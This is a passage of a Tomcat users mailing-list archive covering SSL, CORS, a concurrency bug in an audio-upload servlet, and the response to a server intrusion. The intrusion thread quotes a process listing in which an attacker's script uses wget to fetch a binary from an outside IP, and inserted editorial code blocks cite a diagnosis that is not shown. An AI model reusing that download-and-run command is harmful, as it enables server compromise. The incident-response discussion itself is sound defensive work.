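    }

    /** Buffered copy; returns the number of bytes written. */
    static long copy(InputStream in, OutputStream out) throws IOException {
        byte[] buf = new byte[BUFFER_SIZE];
        long total = 0;
        int n;
        while ((n = in.read(buf)) != -1) {
            out.write(buf, 0, n);
            total += n;
        }
        return total;
    }
}
```

Making the servlet single-threaded would mask the broken shape but not repair it; the fixed shape needs no synchronisation because no request leaves anything behind for the next one to see.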

Re: Setup Issue tomcat 6 SLES 11 SSL

2014-04-30 Thread Terence M. Bandoian

On 4/30/2014 9:02 AM, Christopher Schultz wrote:


Vincent,

On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:

I have setup tomcat 6 on SLES 11 and secured the instance with an
external certificate if authority.  The following is occurring
from the same machine using both IE and Firefox:

http://servername.wooster.edu:8080 works for both IE11 and
Firefox 29 and displays the index.html

https://servername.wooster.edu:8443  works for Firefox 29 and
displays the index.html

https://servername.wooster.edu:8443  does not work for IE11v
displays "This page can't be displayed"

I have changed the logging level to finest and do not see any
errors in the catalina.out.

Thoughts?  I have the same setup on another server and I believe
the files and permission levels are set the same.

What does your SSL configuration look like?

You could also use either sslscan from the CLI or go to
https://www.ssllabs.com/ssltest/ and use their online tool to examine
the site from the outside.

Perhaps you have a combination of protocols and ciphers that MSIE
can't handle.

- -chris



If the option is available, you might also try disabling the IE 
"friendly" error messages.  I'm not sure about IE 11, but it seems like 
previous versions displayed an error message with a reddish background 
if they were unable to authenticate a server with a given SSL 
certificate.  Was a certificate authority bundle supplied with the SSL 
certificate?  If so, is it installed and configured?  Were the SSL 
certificates on the both servers issued by the same company?


-Terence Bandoian





Re: CORS issue with Tomcat and Android Webview

2014-04-30 Thread Terence M. Bandoian

On 4/29/2014 3:48 AM, Jose María Zaragoza wrote:

2014-04-29 0:38 GMT+02:00 Terence M. Bandoian :

On 4/28/2014 5:32 PM, Terence M. Bandoian wrote:

On 4/28/2014 3:08 PM, Jose María Zaragoza wrote:

2014-04-28 21:55 GMT+02:00 Terence M. Bandoian :

On 4/26/2014 6:56 AM, Jose María Zaragoza wrote:

2014-04-26 13:16 GMT+02:00 Martin Gainty :

Date: Sat, 26 Apr 2014 11:43:05 +0530
Subject: Re: CORS issue with Tomcat and Android Webview
From: ankising...@gmail.com
To: users@tomcat.apache.org

On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian
wrote:


On 4/24/2014 11:16 PM, Ankit Singhal wrote:


Hi

I did more research on this and figured out the issue. If you look at the
headers from Android and check the Origin header:

Origin: file://

Tomcat CORS filter tries to validate the URI in Origin header and
considers
"file://" as an invalid URI and returns back 403.

I have applied * params. So shouldn't the CORS
filter honor this?

I agree that Client also has the problem , but still server should
also
allow...


Hi:

I'm watching this flowchart
https://tomcat.apache.org/tomcat-7.0-doc/images/cors-flowchart.png

and I wonder if Tomcat 7 checks whether the request received belongs to the
right type.
I mean, if the browser sends a simple request (e.g. POST + application/xml
content-type header) and the W3C spec says that request should be a preflight
request, does Tomcat check this case?



Regards


Hi, Jose-

I don't see where the W3C spec requires a preflight request for simple
requests.


-Terence Bandoian


Sorry, I meant non-simple request.
For example, if I perform a cross-domain POST request (within
application/xml content-type header ),
I guess that a preflight request is required , right ?
What happens, if it's not sent , on Tomcat? Should it check it ?

Regards



Hi, Jose-

I don't see in the W3C spec where preflight requests are required at all.
Can you point me to where you've found that?

-Terence Bandoian



I meant to say I don't see where the W3C spec requires preflight requests to
be sent.

According to

http://www.w3.org/TR/cors/#simple-cross-origin-request
Cross-Origin Request with Preflight
[
Go to the next step if the following conditions are true. *Otherwise,
make a preflight request.*

- For request method there either is a method cache match or it is a
simple method and the force preflight flag is unset.
- For every header of author request headers there either is a header
cache match for the field name or it is a simple header.
/]

So, I understand that if I make a POST request with an application/xml
content-type header, it's a simple method but Content-Type:
application/xml is not a simple header, according to
http://www.w3.org/TR/cors/#simple-method
I understand that the client must make a preflight request.

Maybe I'm wrong


Regards



Hi, Jose,

I see that now but the logic behind it is a little confusing.  In 
particular, the following sentence at the beginning of the section you 
referenced is not clear to me:


"To protect resources against cross-origin requests that could not 
originate from certain user agents before this specification existed a 
preflight request is made to ensure that the resource is aware of this 
specification."


Are servers required to perform any actions related to preflight 
requests other than responding appropriately to them?


-Terence Bandoian





RE: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Sevlets outputting the audio output from the previous runs of the program instead of the current run.

2014-04-30 Thread Hayward, Leigh
Hi Chris,
Thank you so much for the speedy response .
I have no idea what I'm doing formatting-wise. Pretty much
just wrapping and indenting all by hand, so forgive me if
it's a mess!

>
>From: Christopher Schultz 
>Sent: 30 April 2014 17:58
>To: Tomcat Users List
>Subject: Re: Tomcat 8.0.3.0 getting never before seen by google Illegal State 
>Exception. Sevlets outputting the >audio output from the previous runs of the 
>program instead of the current run.

>-BEGIN PGP SIGNED MESSAGE-
>Hash: SHA256

>Leigh,

>On 4/30/14, 10:31 AM, Hayward, Leigh wrote:
>> My Java EE web application takes in multiple audio inputs and
>> outputs them as a single wav file via an application/octet stream.

>Like a mixer?

Like a concatenator: it adds songs one after the other into one
long song. It then overlays (mixes) another file containing
audio cues on top of the concatenated music. But the issue is
definitely arising at the concatenation phase.
I have the audio writing to a file after each song is added in the
concatenation phase so that I can audibly debug, and the
concatenator is definitely struggling to find the uploaded files.

>> It seemingly randomly works correctly (i.e. outputting the
>> correctly manipulated audio file) but sometimes, the file from a
>> previous run of the program is output and I get one of these
>> errors:
>>
>> SEVERE [http-nio-8084-exec-30]
>> org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads
>> The web application [/MyApp] is still processing a request that has
>> yet to finish. This is very likely to create a memory leak. You can
>> control the time allowed for requests to finish by using the
>> unloadDelay attribute of the standard Context implementation.
>>
>> and to me seemingly random numbers of these errors:
>>
>> "SEVERE [http-nio-8084-exec-87]
>> org.apache.coyote.http11.AbstractHttp11Processor.process Error
>> processing request java.lang.IllegalStateException: The resources
>> may not be accessed if they are not currently started?"


>These kinds of things are almost always due to storing of a request or
>response option in some kind of structure that survives past the end
>of a particular request.

>Can you explain how you build the response -- specifically involving
>any non-standard threading you may do?

The response is built in a method called finish which is called in 
doPost like this :

finish(req, res);
In finish I make a printwriter
I set response content type to "application/octet-stream",
set the header  "Content-Disposition" to 
"attachment; filename=finished.wav"
I make a FileInputStream of the finished filepath
Then I set the header content length to the length of the finished file.
then I while loop the fileInputStream into the printwriter
Then I close the FIS.

I have not touched threading since it looks terrifying.
I did experiment with making the servlet single-threaded
since I thought it could have something to do with threads
(bad practice I know) but that did nothing to help.


>> The files always upload correctly to my filesystem, but something
>> is going wrong when I try to access them in order to process them.

>What mechanism do you use for upload?

My servlet has a location set in the @multipartconfig tag
that is where all files are saved to and retrieved from.
I am getting the Parts from the request then iterating through them,
for each part that is a file upload I use
part.write("uploadedfile" + count + ".wav"); 


>> Also when it is downloading the file it appears to the user to be
>> several MB long despite the file that is output being only a few
>> thousand KB.

>NB a few thousand KiB is the definition of several MiB.

I am possibly just an idiot on that one.
I think the deadline sleep deprivation is getting to me.


>Is the response built before you stream any of it to the client? Are
>you setting a Content-Length before you send any data? Are you using
>chunked responses?

I call a finish(req, res) method in my doPost which is where all my 
response building is done. 
I am setting a content length before I send the data because I wanted
to be able to see how long it was going to take to download since the 
program is fairly slow.

>> Sometimes when it doesn't work it does not produce these errors,
>> but it never produces these errors when it works correctly.

>Does (increased) load seem to make the situation worse?

Definitely. Always happens with long audio files and only sometimes
with shorter test ones.

>> I have googled it but there's no reference to the second kind of
>> error anywhere on the web aside from svn commits by tomcat
>> developers, so while I am a total newbie to mailing lists, after
>> exhausting stackoverflow this seemed like the only place to turn
>> to. I'm developing a java EE web application in Netbeans using
>> Tomcat 8.0.3.0 on a windows 7 operating system.

>(You should upgrade to a later Tomcat 8 beta. Nothing should affect
>what you are seein
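Konstantin's diagnosis applies to the mechanism described above: every request writes the same uploadedfileN.wav and finished.wav names, so overlapping requests overwrite each other's files and one user can download another user's output. The following is an added example written for this thread (not Leigh's servlet code) of the per-request isolation Chris asks about, with the finished file streamed as raw bytes and its length known before the first byte is sent; it assumes Java 11+ and a caller that passes part.getInputStream() for each uploaded Part.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import java.nio.file.StandardOpenOption;
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;
import java.util.stream.Collectors;
import java.util.stream.Stream;

/**
 * Added example, not code from Leigh's servlet: one private directory per
 * request, so two concurrent requests never write the same "uploadedfileN.wav"
 * or read each other's "finished.wav". A servlet would create one of these at
 * the top of doPost() and hand it part.getInputStream() for every uploaded Part.
 */
public final class RequestWorkspace implements AutoCloseable {
    private final Path dir;
    private final List<Path> uploads = new ArrayList<>();

    private RequestWorkspace(Path dir) {
        this.dir = dir;
    }

    /** baseDir is e.g. the @MultipartConfig location; the sub-directory name is unique per call. */
    public static RequestWorkspace create(Path baseDir) throws IOException {
        Files.createDirectories(baseDir);
        // createTempDirectory picks a fresh name atomically, so concurrent requests cannot collide
        return new RequestWorkspace(Files.createTempDirectory(baseDir, "req-"));
    }

    public Path dir() {
        return dir;
    }

    /** Stores one uploaded stream; the counter only has to be unique within this request. */
    public Path storeUpload(InputStream in) throws IOException {
        Path target = dir.resolve("uploadedfile" + uploads.size() + ".wav");
        Files.copy(in, target, StandardCopyOption.REPLACE_EXISTING);
        uploads.add(target);
        return target;
    }

    public Path finishedFile() {
        return dir.resolve("finished.wav");
    }

    /**
     * Stand-in for the real concatenation step: appends the raw bytes of every
     * upload into finished.wav. Real WAV joining must also rewrite the RIFF
     * header; that is outside this example.
     */
    public Path concatenateRaw() throws IOException {
        Path out = finishedFile();
        try (OutputStream os = Files.newOutputStream(out,
                StandardOpenOption.CREATE, StandardOpenOption.TRUNCATE_EXISTING)) {
            for (Path upload : uploads) {
                Files.copy(upload, os);
            }
        }
        return out;
    }

    /** Value to pass to response.setContentLengthLong(...) before any byte is written. */
    public long finishedLength() throws IOException {
        return Files.size(finishedFile());
    }

    /** Streams finished.wav as raw bytes (response.getOutputStream(), never a PrintWriter, which re-encodes). */
    public long sendFinished(OutputStream out) throws IOException {
        try (InputStream in = Files.newInputStream(finishedFile())) {
            return in.transferTo(out);
        }
    }

    /** Deletes the whole per-request directory once the response has been sent. */
    @Override
    public void close() throws IOException {
        List<Path> paths;
        try (Stream<Path> walk = Files.walk(dir)) {
            paths = walk.sorted(Comparator.reverseOrder()).collect(Collectors.toList());
        }
        for (Path p : paths) {
            Files.delete(p);
        }
    }

    /** Demo with constructed input: two "requests" handled at the same time land in different directories. */
    public static void main(String[] args) throws Exception {
        Path base = Files.createTempDirectory("uploads-base");
        try (RequestWorkspace a = RequestWorkspace.create(base);
             RequestWorkspace b = RequestWorkspace.create(base)) {
            a.storeUpload(new ByteArrayInputStream("song-A1".getBytes(StandardCharsets.UTF_8)));
            a.storeUpload(new ByteArrayInputStream("song-A2".getBytes(StandardCharsets.UTF_8)));
            b.storeUpload(new ByteArrayInputStream("song-B1".getBytes(StandardCharsets.UTF_8)));
            a.concatenateRaw();
            b.concatenateRaw();
            System.out.println(a.dir() + " (" + a.finishedLength() + " bytes): " + Files.readString(a.finishedFile()));
            System.out.println(b.dir() + " (" + b.finishedLength() + " bytes): " + Files.readString(b.finishedFile()));
        }
        Files.delete(base);
    }
}
```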

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello Christopher, thanks for your response.

I have a copy of 4.sh and squid (binary ELF file) and tried to see, using
strings, what this program does. I couldn't see anything =(

I'm monitoring the server to get a dump at the moment this injection
occurs.

Files still uploading =(

Thanks for all, kind regards


Saludos.-
Leonardo Santagostini







2014-04-30 14:07 GMT-03:00 Christopher Schultz :

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA256
>
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> > Im uploading mi logfiles so it will be available when finished
> > uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a copy
> in case the attacker tries to clean-up after themselves. That's
> certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict outgoing
> requests so that the attack can't progress across your network.
>
> > Regarding the configuration, its working in two other sites
> > without problem, and there is no problem putting L4 balancing with
> > haproxy.
> >
> > I have asked developers about that exploit, still without answer.
>
> You appear to be using struts2 2.1.8, which is in the range of
> versions vulnerable to this bug. There is a workaround that you can
> probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
> section on this page).
>
> Of course, the vulnerability doesn't allow you to simply inject code
> or anything like that: you can certainly mess-around with code that is
> already available on the site, though.
>
> - -chris
>
>
>


Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Leonardo,

On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> Im uploading mi logfiles so it will be available when finished
> uploading.

Remember to get a thread dump while Runtime.exec() is running.

You should copy the script /tmp/4.sh somewhere else so you have a copy
in case the attacker tries to clean-up after themselves. That's
certainly what's doing the evil work.

You could probably set up iptables or something to restrict outgoing
requests so that the attack can't progress across your network.

> Regarding the configuration, its working in two other sites
> without problem, and there is no problem putting L4 balancing with
> haproxy.
> 
> I have asked developers about that exploit, still without answer.

You appear to be using struts2 2.1.8, which is in the range of
versions vulnerable to this bug. There is a workaround that you can
probably apply:
http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
section on this page).

Of course, the vulnerability doesn't allow you to simply inject code
or anything like that: you can certainly mess-around with code that is
already available on the site, though.

- -chris
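Two of the checks raised in this thread, that the `sh` really descends from the Tomcat JVM (Chris's earlier request to verify it is Tomcat's JVM and not just any JVM) and that /tmp/4.sh is preserved with a hash before the attacker cleans up, as an added triage helper written for this page (not a Tomcat tool nor anyone's code from the list); it assumes Java 9+ for ProcessHandle and a JDK with jcmd on PATH, run as the user that owns the Tomcat JVM.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardCopyOption;
import java.nio.file.StandardOpenOption;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;

/** Added triage helper for this thread (not a Tomcat tool). Requires Java 9+ and jcmd on PATH. */
public final class IntrusionTriage {

    /** Command lines of pid and all of its ancestors, nearest first. */
    public static List<String> ancestry(long pid) {
        List<String> chain = new ArrayList<>();
        Optional<ProcessHandle> h = ProcessHandle.of(pid);
        while (h.isPresent()) {
            ProcessHandle p = h.get();
            // commandLine() is empty for processes owned by another user; fall back to the executable path
            String cmd = p.info().commandLine().orElse(p.info().command().orElse("?"));
            chain.add(p.pid() + " " + cmd);
            h = p.parent();
        }
        return chain;
    }

    /** True when some ancestor is a JVM started through Tomcat's Bootstrap class. */
    public static boolean spawnedByTomcat(List<String> chain) {
        return chain.stream().anyMatch(IntrusionTriage::looksLikeTomcatJvm);
    }

    static boolean looksLikeTomcatJvm(String cmdline) {
        return cmdline.contains("org.apache.catalina.startup.Bootstrap")
                || cmdline.contains("-Dcatalina.base=");
    }

    /** Copies the suspicious file (timestamps preserved) into evidenceDir and appends its SHA-256 to hashes.txt. */
    public static String preserve(Path suspicious, Path evidenceDir)
            throws IOException, NoSuchAlgorithmException {
        Files.createDirectories(evidenceDir);
        Path copy = evidenceDir.resolve(suspicious.getFileName() + ".copy");
        Files.copy(suspicious, copy, StandardCopyOption.COPY_ATTRIBUTES, StandardCopyOption.REPLACE_EXISTING);
        byte[] digest = MessageDigest.getInstance("SHA-256").digest(Files.readAllBytes(copy));
        String hex = toHex(digest);
        Files.write(evidenceDir.resolve("hashes.txt"),
                (hex + "  " + suspicious + System.lineSeparator()).getBytes(),
                StandardOpenOption.CREATE, StandardOpenOption.APPEND);
        return hex;
    }

    static String toHex(byte[] bytes) {
        StringBuilder sb = new StringBuilder(bytes.length * 2);
        for (byte b : bytes) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString();
    }

    /** Writes a full thread dump of the JVM to outFile (what the list asked for) and returns jcmd's exit code. */
    public static int threadDump(long jvmPid, Path outFile) throws IOException, InterruptedException {
        Process jcmd = new ProcessBuilder("jcmd", Long.toString(jvmPid), "Thread.print")
                .redirectErrorStream(true)
                .redirectOutput(outFile.toFile())
                .start();
        return jcmd.waitFor();
    }

    /** Usage: java IntrusionTriage <pid of the sh process> <script path> <evidence dir> */
    public static void main(String[] args) throws Exception {
        long shPid = Long.parseLong(args[0]);
        Path evidence = Paths.get(args[2]);
        List<String> chain = ancestry(shPid);
        chain.forEach(line -> System.out.println("  " + line));
        Optional<String> jvm = chain.stream().filter(IntrusionTriage::looksLikeTomcatJvm).findFirst();
        if (jvm.isPresent()) {
            long jvmPid = Long.parseLong(jvm.get().split(" ", 2)[0]);
            int rc = threadDump(jvmPid, evidence.resolve("tomcat-threads-" + jvmPid + ".txt"));
            System.out.println("sh descends from Tomcat JVM " + jvmPid + "; jcmd exit code " + rc);
        } else {
            System.out.println("no Tomcat JVM in the ancestry: sh was started by some other process");
        }
        System.out.println("sha256 " + preserve(Paths.get(args[1]), evidence));
    }
}
```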




Re: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Sevlets outputting the audio output from the previous runs of the program instead of the current run.

2014-04-30 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Leigh,

On 4/30/14, 10:31 AM, Hayward, Leigh wrote:
> My Java EE web application takes in multiple audio inputs and
> outputs them as a single wav file via an application/octet stream.

Like a mixer?

> It seemingly randomly works correctly (i.e. outputting the
> correctly manipulated audio file) but sometimes, the file from a
> previous run of the program is output and I get one of these
> errors:
> 
> SEVERE [http-nio-8084-exec-30]
> org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads
> The web application [/MyApp] is still processing a request that has
> yet to finish. This is very likely to create a memory leak. You can
> control the time allowed for requests to finish by using the
> unloadDelay attribute of the standard Context implementation.
> 
> and to me seemingly random numbers of these errors:
> 
> "SEVERE [http-nio-8084-exec-87]
> org.apache.coyote.http11.AbstractHttp11Processor.process Error
> processing request java.lang.IllegalStateException: The resources
> may not be accessed if they are not currently started?"

These kinds of things are almost always due to storing of a request or
response option in some kind of structure that survives past the end
of a particular request.

Can you explain how you build the response -- specifically involving
any non-standard threading you may do?

> The files always upload correctly to my filesystem, but something
> is going wrong when I try to access them in order to process them.

What mechanism do you use for upload?

> Also when it is downloading the file it appears to the user to be
> several MB long despite the file that is output being only a few 
> thousand KB.

NB a few thousand KiB is the definition of several MiB.

Is the response built before you stream any of it to the client? Are
you setting a Content-Length before you send any data? Are you using
chunked responses?

> Sometimes when it doesn't work it does not produce these errors,
> but it never produces these errors when it works correctly.

Does (increased) load seem to make the situation worse?

> I have googled it but there's no reference to the second kind of
> error anywhere on the web aside from svn commits by tomcat
> developers, so while I am a total newbie to mailing lists, after
> exhausting stackoverflow this seemed like the only place to turn
> to. I'm developing a java EE web application in Netbeans using
> Tomcat 8.0.3.0 on a windows 7 operating system.

(You should upgrade to a later Tomcat 8 beta. Nothing should affect
what you are seeing here, but it's not a bad idea to get the latest.)

> The web application is very basic and allows users to upload files
> via a multipart html form. This then posts to a servlet which first
> uploads these files to the programs file system and then accesses
> them, concatenates them together and saves them back on the file
> system. It's better explained by this diagram
> http://imgur.com/Oacd4gq

The real question is whether you are using non-request-processor
threads to do any of this work. Also, where are the various data
stored while you are working on them? Not the filesystem -- that seems
self-evident -- but where in the program are the String[] objects that
represent all the songs that have been uploaded?

When you process a "transaction" (upload -> merge -> respond), are you
taking care to ensure that the files are placed into different paths
for each request? How are you choosing the filename of the merged
audio clip?

> Could it be that the files are not being uploaded fully before they
> are being accessed?

I don't believe this is possible when using Tomcat's file-upload
implementation. It is certainly possible to do if you are performing
the multipart handling yourself. What tool are you using to fetch the
multipart data from the request?

- -chris




Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello Martin/Felix,

I'm uploading my logfiles so they will be available when finished uploading.

Regarding the configuration, it's working in two other sites without
problem, and there is no problem putting L4 balancing with haproxy.

I have asked developers about that exploit, still without answer.

I will let you know how things are going, thanks for all =)

Regards/Saludos!

BTW: Martin, thanks for your Spanish words. Really appreciate it =)

Saludos.-
Leonardo Santagostini







2014-04-30 13:20 GMT-03:00 Felix Schumacher <
felix.schumac...@internetallee.de>:

>
>
> On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini <
> lsantagost...@gmail.com> wrote:
> >Hello list,
> >
> >well my homework is done
> >
> >Here are the links:
> >
> >setenv.sh: http://pastebin.com/EN1mXDFi
> >catalina.sh: http://pastebin.com/1vRVLbSm
> >web.xml: http://pastebin.com/BqEfiXXm
> >server.xml: http://pastebin.com/wfzE8bYU
> >logging.properties: http://pastebin.com/Qurk8sLU
> >catalina.properties: http://pastebin.com/jkfY1ZRQ
> >tree + logsfiles: http://pastebin.com/j3tip4ij
>
> From the logfiles it looks like you have struts2 applications. It might be
> that you are hit by a security problem within struts2 ( Konstantin
> forwarded a warning a few days ago
> http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html).
>
> >
> >Note that logsfiles, are not the logfiles itsef but only a ls -lah
> >(just
> >for you to see the logsizes)
> >
> >A little more about the infraestructure i've mounted ill do some ascii
> >art.
> >
> >
> >internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
> >(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
>
> That seems a bit too complex. In my eyes you need no haproxy between httpd
> and tomcat when you use mod_jk.
>
> Regards
>  Felix
> >
> >
> >Apache(2) is serving static content so haproxy(1) at the first level
> >does
> >http round robin balancing
> >Apache(2) connects to tomcat(5) through haproxy(4) (using L4
> >connection)
> >using mod_jk(3)
> >Tomcat(5) are the main app server (the ones gets intruded) who uses
> >tomcat(7) (solr service) using haproxy(6) using L4 connection.
> >
> >Versions:
> >
> >Apache: 2.2.17
> >mod_jk: 1.2.31
> >haproxy: 1.4.22
> >Tomcat: 7.0.53
> >Java: 1.6.0.41
> >
> >[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> >java version "1.6.0_41"
> >Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
> >Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
> >
> >OS: CentOS 5.8 64 bit
> >
> >[root@arcbaappvrt05 tomcat]# uname -a
> >Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
> >21
> >20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> >[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
> >CentOS release 5.8 (Final)
> >[root@arcbaappvrt05 tomcat]#
> >
> >For now i havent see that the squid process whas launched so i couldnt
> >do a
> >dump
> >
> >Letme know if you need more information.
> >
> >BTW, pastebin links will work for one week.
> >
> >Kind regards, yours
> >
> >
> >
> >
> >Saludos.-
> >Leonardo Santagostini
> >
> >
> >
> >
> >
> >
> >
> >2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
> >:
> >
> >> Ok, i will do the following:
> >>
> >> 1) thread dump of running tomcat instance
> >> 2) Pastebin the running tomcat config
> >>
> >> I think at mid day will have all the info.
> >>
> >> Thanks all for replying me and all the responses.
> >>
> >> Regards, Leonardo
> >>
> >> Saludos.-
> >> Leonardo Santagostini
> >>
> >> 
> >>
> >>
> >>
> >>
> >>
> >> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> >> ch...@christopherschultz.net>:
> >>
> >> -BEGIN PGP SIGNED MESSAGE-
> >>> Hash: SHA256
> >>>
> >>> Konstantin,
> >>>
> >>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> >>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> >>> > :
> >>> >> Hello Dan,
> >>> >>
> >>> >> Nop, the attacker is executing locally the following
> >>> >>
> >>> >> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
> >>> >> tomcat8893  8882  0 Apr27 ?00:00:00 wget
> >>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >>> >>
> >>> >> And the launch squid who tries to connect via ssh to varoius
> >>> >> places.
> >>> >>
> >>> >> Right now its time to leave the office, but in a few hours i will
> >>> >> paste in pastebin access logs, config files, wherever you tell
> >>> >> me.
> >>> >>
> >>> >> This is my pstree
> >>> >>
> >>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
> >>> >> ├─java─┬─sh───wget │  └─263*[{java}]
> >>> >
> >>> > sh launched by tomcat's java?
> >>>
> >>> Yes: please verify that it's the JVM running Tomcat, and not just
> >any
> >>> JVM process.
> >>>
> >>> > Take a thread dump:
> >>> >
> >>>
> >
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of

Re: Regarding i think an intrusion

2014-04-30 Thread Felix Schumacher


On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini 
 wrote:
>Hello list,
>
>well my homework is done
>
>Here are the links:
>
>setenv.sh: http://pastebin.com/EN1mXDFi
>catalina.sh: http://pastebin.com/1vRVLbSm
>web.xml: http://pastebin.com/BqEfiXXm
>server.xml: http://pastebin.com/wfzE8bYU
>logging.properties: http://pastebin.com/Qurk8sLU
>catalina.properties: http://pastebin.com/jkfY1ZRQ
>tree + logsfiles: http://pastebin.com/j3tip4ij

From the logfiles it looks like you have struts2 applications. It might be
that you are hit by a security problem within struts2 (Konstantin forwarded a
warning a few days ago
http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html
).

>
>Note that logsfiles, are not the logfiles itsef but only a ls -lah
>(just
>for you to see the logsizes)
>
>A little more about the infraestructure i've mounted ill do some ascii
>art.
>
>
>internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
>(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)

That seems a bit too complex. In my eyes you need no haproxy between httpd and 
tomcat when you use mod_jk.

Regards
 Felix
>
>
>Apache(2) is serving static content so haproxy(1) at the first level
>does
>http round robin balancing
>Apache(2) connects to tomcat(5) through haproxy(4) (using L4
>connection)
>using mod_jk(3)
>Tomcat(5) are the main app server (the ones gets intruded) who uses
>tomcat(7) (solr service) using haproxy(6) using L4 connection.
>
>Versions:
>
>Apache: 2.2.17
>mod_jk: 1.2.31
>haproxy: 1.4.22
>Tomcat: 7.0.53
>Java: 1.6.0.41
>
>[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
>java version "1.6.0_41"
>Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
>Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
>
>OS: CentOS 5.8 64 bit
>
>[root@arcbaappvrt05 tomcat]# uname -a
>Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
>21
>20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
>[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
>CentOS release 5.8 (Final)
>[root@arcbaappvrt05 tomcat]#
>
>For now i havent see that the squid process whas launched so i couldnt
>do a
>dump
>
>Letme know if you need more information.
>
>BTW, pastebin links will work for one week.
>
>Kind regards, yours
>
>
>
>
>Saludos.-
>Leonardo Santagostini
>
>
>
>
>
>
>
>2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
>:
>
>> Ok, i will do the following:
>>
>> 1) thread dump of running tomcat instance
>> 2) Pastebin the running tomcat config
>>
>> I think at mid day will have all the info.
>>
>> Thanks all for replying me and all the responses.
>>
>> Regards, Leonardo
>>
>> Saludos.-
>> Leonardo Santagostini
>>
>> 
>>
>>
>>
>>
>>
>> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
>> ch...@christopherschultz.net>:
>>
>> -BEGIN PGP SIGNED MESSAGE-
>>> Hash: SHA256
>>>
>>> Konstantin,
>>>
>>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
>>> > :
>>> >> Hello Dan,
>>> >>
>>> >> Nop, the attacker is executing locally the following
>>> >>
>>> >> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
>>> >> tomcat8893  8882  0 Apr27 ?00:00:00 wget
>>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>>> >>
>>> >> And the launch squid who tries to connect via ssh to varoius
>>> >> places.
>>> >>
>>> >> Right now its time to leave the office, but in a few hours i will
>>> >> paste in pastebin access logs, config files, wherever you tell
>>> >> me.
>>> >>
>>> >> This is my pstree
>>> >>
>>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
>>> >> ├─java─┬─sh───wget │  └─263*[{java}]
>>> >
>>> > sh launched by tomcat's java?
>>>
>>> Yes: please verify that it's the JVM running Tomcat, and not just
>any
>>> JVM process.
>>>
>>> > Take a thread dump:
>>> >
>>>
>https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>>> >
>>> >  It shall show what is stacktrace in thread that launched external
>>> > process.
>>>
>>> +1
>>>
>>> The only things that ship with Tomcat that call Process.exec() are
>the
>>> CGI servlet and SSI, both of which are disabled by default. So,
>either
>>> you have an insecure CGI/SSI configuration, your web application has
>a
>>> vulnerability, or you have deployed something like the Manager
>>> application and improperly-secured it.
>>>
